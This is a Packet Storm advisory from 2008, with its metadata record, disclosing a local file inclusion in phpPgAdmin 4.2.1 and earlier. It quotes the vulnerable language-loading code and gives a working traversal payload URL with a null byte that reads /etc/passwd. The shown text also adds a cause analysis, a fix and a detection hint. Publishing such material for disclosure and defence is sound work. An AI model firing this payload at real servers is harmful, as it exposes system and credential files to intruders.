ID PACKETSTORM:72700
Type packetstorm
Reporter dun
Modified 2008-12-09T00:00:00
Description
` :::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
##################################################################
# [ phpPgAdmin <= 4.2.1 ] Local File Inclusion Vulnerability #
##################################################################
#
# Script: "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services."
#
# Script site: http://www.phppgadmin.org/
# Download: http://phppgadmin.sourceforge.net/?page=download
#
# Vuln: http://site.com/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00
#
# Bug: ./phpPgAdmin-4.2.1/index.php (line: 11)
#
# ...
# include_once('./libraries/lib.inc.php');
# ...
#
#
# Bug: ./phpPgAdmin-4.2.1/libraries/lib.inc.php (lines: 22-138; vulnerable include() at line 136)
#
# ...
# // Determine language file to import:
# // 1. Check for the language from a request var
# if (isset($_REQUEST['language']) && isset($appLangFiles[$_REQUEST['language']]))
# $_language = $_REQUEST['language'];
#
# // 2. Check for language session var
# if (!isset($_language) && isset($_SESSION['webdbLanguage']) && isset($appLangFiles[$_SESSION['webdbLanguage']])) {
# $_language = $_SESSION['webdbLanguage'];
# }
#
# // 3. Check for acceptable languages in HTTP_ACCEPT_LANGUAGE var
# if (!isset($_language) && $conf['default_lang'] == 'auto' && isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
# // extract acceptable language tags
# // (http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4)
# preg_match_all('/\s*([a-z]{1,8}(?:-[a-z]{1,8})*)(?:;q=([01](?:.[0-9]{0,3})?))?\s*(?:,|$)/', strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), $_m, PREG_SET_ORDER);
# foreach($_m as $_l) { // $_l[1] = language tag, [2] = quality
# if (!isset($_l[2])) $_l[2] = 1; // Default quality to 1
# if ($_l[2] > 0 && $_l[2] <= 1 && isset($availableLanguages[$_l[1]])) {
# // Build up array of (quality => language_file)
# $_acceptLang[$_l[2]] = $availableLanguages[$_l[1]];
# }
# }
# unset($_m);
# unset($_l);
# if (isset($_acceptLang)) {
# // Sort acceptable languages by quality
# krsort($_acceptLang, SORT_NUMERIC);
# $_language = reset($_acceptLang);
# unset($_acceptLang);
# }
# }
#
# // 4. Otherwise resort to the default set in the config file
# if (!isset($_language) && $conf['default_lang'] != 'auto' && isset($appLangFiles[$conf['default_lang']])) {
# $_language = $conf['default_lang'];
# }
#
# // Import the language file
# if (isset($_language)) {
# include("./lang/recoded/{$_language}.php"); // * LFI *
# $_SESSION['webdbLanguage'] = $_language;
# }
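# ...
#
# Why it works: the request parameter is "_language", not "language". Each of the four
# checks above assigns $_language only a name found in $appLangFiles / $availableLanguages,
# but check 1 looks at $_REQUEST['language'] only, and checks 2-4 are skipped as soon as
# $_language is already set. If PHP has created $_language from the request before this
# code runs (presumably register_globals = On -- not stated in the original report), the
# value reaches include() without any validation. The trailing %00 cuts off the ".php"
# suffix on older PHP versions that do not reject NUL bytes in file paths.
#
# Fix: unset/initialise $_language before check 1, pass only keys of $appLangFiles to
# include(), and run with register_globals disabled.
#
# Detection: web server access logs showing requests with a "_language=" parameter that
# contains "../" or "%00".
#
#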
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
`
{"id": "PACKETSTORM:72700", "type": "packetstorm", "bulletinFamily": "exploit", "title": "phpPgAdmin 4.2.1 Local File Inclusion", "description": "", "published": "2008-12-09T00:00:00", "modified": "2008-12-09T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/72700/phpPgAdmin-4.2.1-Local-File-Inclusion.html", "reporter": "dun", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:12", "viewCount": 3, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:22:12", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:12", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/72700/phppgadmin-lfi.txt", "sourceData": "` :::::::-. ... ::::::. :::. \n;;, `';, ;; ;;;`;;;;, `;;; \n`[[ [[[[' [[[ [[[[[. '[[ \n$$, $$$$ $$$ $$$ \"Y$c$$ \n888_,o8P'88 .d888 888 Y88 \nMMMMP\"` \"YmmMMMM\"\" MMM YM \n \n[ Discovered by dun \\ dun[at]strcpy.pl ] \n \n################################################################## \n# [ phpPgAdmin <= 4.2.1 ] Local File Inclusion Vulnerability # \n################################################################## \n# \n# Script: \"phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services.\" \n# \n# Script site: http://www.phppgadmin.org/ \n# Download: http://phppgadmin.sourceforge.net/?page=download \n# \n# Vuln: http://site.com/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 \n# \n# Bug: ./phpPgAdmin-4.2.1/index.php (line: 11) \n# \n# ... \n# include_once('./libraries/lib.inc.php'); \n# ... \n# \n# \n# Bug: ./phpPgAdmin-4.2.1/libraries/lib.inc.php (lines: 22-138 -> 136) \n# \n# ... \n# // Determine language file to import: \n# // 1. 
Check for the language from a request var \n# if (isset($_REQUEST['language']) && isset($appLangFiles[$_REQUEST['language']])) \n# $_language = $_REQUEST['language']; \n# \n# // 2. Check for language session var \n# if (!isset($_language) && isset($_SESSION['webdbLanguage']) && isset($appLangFiles[$_SESSION['webdbLanguage']])) { \n# $_language = $_SESSION['webdbLanguage']; \n# } \n# \n# // 3. Check for acceptable languages in HTTP_ACCEPT_LANGUAGE var \n# if (!isset($_language) && $conf['default_lang'] == 'auto' && isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { \n# // extract acceptable language tags \n# // (http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4) \n# preg_match_all('/\\s*([a-z]{1,8}(?:-[a-z]{1,8})*)(?:;q=([01](?:.[0-9]{0,3})?))?\\s*(?:,|$)/', strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), $_m, PREG_SET_ORDER); \n# foreach($_m as $_l) { // $_l[1] = language tag, [2] = quality \n# if (!isset($_l[2])) $_l[2] = 1; // Default quality to 1 \n# if ($_l[2] > 0 && $_l[2] <= 1 && isset($availableLanguages[$_l[1]])) { \n# // Build up array of (quality => language_file) \n# $_acceptLang[$_l[2]] = $availableLanguages[$_l[1]]; \n# } \n# } \n# unset($_m); \n# unset($_l); \n# if (isset($_acceptLang)) { \n# // Sort acceptable languages by quality \n# krsort($_acceptLang, SORT_NUMERIC); \n# $_language = reset($_acceptLang); \n# unset($_acceptLang); \n# } \n# } \n# \n# // 4. Otherwise resort to the default set in the config file \n# if (!isset($_language) && $conf['default_lang'] != 'auto' && isset($appLangFiles[$conf['default_lang']])) { \n# $_language = $conf['default_lang']; \n# } \n# \n# // Import the language file \n# if (isset($_language)) { \n# include(\"./lang/recoded/{$_language}.php\"); // * LFI * \n# $_SESSION['webdbLanguage'] = $_language; \n# } \n# ... \n# \n# \n############################################### \n# Greetz: D3m0n_DE * str0ke * and otherz.. 
\n############################################### \n \n[ dun / 2008 ] \n \n******************************************************************************************* \n \n`\n", "immutableFields": []}
{}